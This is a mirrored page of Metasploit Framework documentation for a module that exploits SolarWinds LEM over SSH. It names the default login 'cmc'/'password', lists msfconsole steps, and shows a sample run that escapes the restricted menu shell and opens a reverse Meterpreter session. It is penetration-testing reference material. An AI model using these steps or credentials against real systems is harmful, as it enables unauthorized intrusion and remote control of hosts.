CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/ssh/solarwinds_lem_exec.md
Views: 11789

Vulnerable Application

This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.

Vulnerable application can be download as a free trial from vendor webpage. http://www.solarwinds.com/log-event-manager

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/linux/ssh/solarwinds_lem_exec

  3. Do: set rhost <ip>

  4. Do: set lhost <ip>

  5. Do: exploit

  6. You should get a shell.

Scenarios

This is a run against a known vulnerable Solarwinds LEM server.

msf exploit(solarwind_lem_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.

msf exploit(solarwind_lem_exec) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: cmc
meterpreter >